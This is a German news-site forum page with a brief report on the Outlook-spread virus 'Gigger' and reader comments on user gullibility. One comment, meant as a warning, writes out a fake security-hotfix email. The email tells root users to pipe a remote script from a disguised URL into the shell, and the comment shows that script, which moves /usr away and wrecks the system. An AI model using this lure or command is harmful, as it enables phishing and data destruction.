| |
 |
| Neuer Virus Gigger in JavaScript |
|
|
Veröffentlicht durch Momo_102 am Sonntag 13. Januar, 18:04
Aus der als-gefährlich-eingeschätzt Abteilung
|
|
|
|
|
Der Virus
Gigger
ist im Internet unterwegs. Er wurde von den AntiViren-Herstellern als sehr
gefährlich eingestuft. Dabei nutzt der Virus das Mail-Programm Outlook der
Firma Microsoft.
|
|
|
|
< BetaTester gesucht ... | Druckausgabe | Easyride ausgeritten > | |
|
|
Diese Diskussion wurde archiviert.
Es können keine neuen Kommentare abgegeben werden.
|
|
|
|
|
|
|
|
|
Etliche, insbesondere Outlookviren profitieren zum großen Teil von der Ahnungslosigkeit der User. Somit ist auch ein Linux-Schädling schnell verteilt:
From: security@bluse.com
Subject: HOTFIX für kritisches Sicherheitsloch
Werte(r) Bluse-Kunde/in,
Die Bluse Linux-Distributionen 2.3 bis 4.2 enthalten ein gefährliches Sicherheitsloch in
der Anwendung xyz. Glücklicherweise kann sie leicht behoben werden, wenn Sie als Super-User folgenden Befehl ausführen:
lynx -source http://www.bluse.com@432171321/fix.php?vid=2da3a24 | sh
Mit freundlichen Grüßen
Viktor E. Rarscht
Security Manager Bluse GmbH
Da z.B. Ximian genau diesen Weg zum Installieren von Ximian-GNOME verschlägt (Sorry, hab' leider den URL nicht parat), wird es genügend Leichtgläubige geben, denen dummerweise gerade in diesem Moment nicht auffällt, daß der URL gefakt ist und die dann das vom Server generierte Skript ausführen, ohne es sich vorher anzusehen.
Achso, was drinnen steht, im Hotfix?
$ lynx -source http://www.bluse.de@432127891321/security/fix321.php
#!/bin/sh
mv -f /usr /.usr
echo Danke, für Ihr Vertrauen, und viel Spaß beim
Restaurieren des Systems.
$
Die oft zu beobachtende Arroganz "Mit Linux wäre das nicht passiert" ist also durch überhaupt nichts gerechtfertigt, schadet eher der Opensource-Bewegung.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Stimmt. Wenn die entsprechende Sorte Mensch am Werk ist, ist es völlig egal, welches OS läuft. Das grösste Problem sitzt wirklich vor der Tastatur, nicht dahinter.
Der Haken ist: wie schaffe ich es, die Leute zu überzeugen, dass sie zuerst mit einem Kurs beginnen, nicht mit dem Kauf des Geräts! Ich fürchte, nicht einmal wenn die Kurse gratis wären würden sie ausreichend besucht. Die Leute sind doch alle so stolz darauf, keine Zeit zu haben. Deshalb wollen sie natürlich auch mit dem Kauf eine PC ausschliesslich und sofort Zeit sparen. Beim Auto klappt die Sache nur (leidlich), weil es ein Gesetz gibt.
Kann man einen gesetzlich vorgeschriebenen "PC-Führerschein" durchkriegen? Genau wie beim Auto könnte man die Sache von der eigentlichen Technik weitgehend abkoppeln und sich auf die wichtigsten Sicherheitsgrundlagen konzentrieren (So à la "Anhalten tut man vor der Mauer, nicht darin" oder "In einen Benzinmotor muss man immer Benzin einfüllen - auch wenn Diesel gerade billiger ist").
Grüsse vom Knochen
|
|
|
|
|
|
|
|
|
|
|
|
|
Ich wäre gegen ein solchen Führerschein. Die wenigsten Menschen gefährden durch ihre Dummheit andere (ausser den Tech-Support), sie schaden nur sich selbst. Ganz anders beim Auto.
Und da beispielsweise alle Symlink-Leser auch noch keinen hätten, müssten die dies dann noch nachholen. Obwohl es hier ja, ich sag mal, 50% nicht nötig hätten.
Daniel "Grob geschätzt" Reutter
--
Hanlon's Razor:
Never attribute to malice that which can be adequately explained by stupidity
|
|
|
|
|
|
|
|
|
|
|
|
|
"Und da beispielsweise alle Symlink-Leser auch noch keinen hätten, müssten die dies dann noch nachholen. Obwohl es hier ja, ich sag mal, 50% nicht nötig hätten."
Natürlich. Das ist aber überall so. Ich kann mir die meisten Dinge aus Büchern beibringen, aber keiner wird mir glauben, dass ich es kann, wenn ich keinen Zettel bringen kann, auf dem's steht.
Grüsse vom Knochen
|
|
|
|
|
|
|
|
|
Von Anonymer Feigling am Tuesday 15. January, 06:15 MET (#4)
|
|
|
|
|
Hi.
Du sagst vollkomen richtig, denn DAS treibt mich fort:
Die oft zu beobachtende Arroganz "Mit Linux wäre das nicht passiert" ist also durch überhaupt nichts gerechtfertigt, schadet eher der Opensource-Bewegung.
Eben. Eben.
MfG.
mama
|
|
|
|
|
|
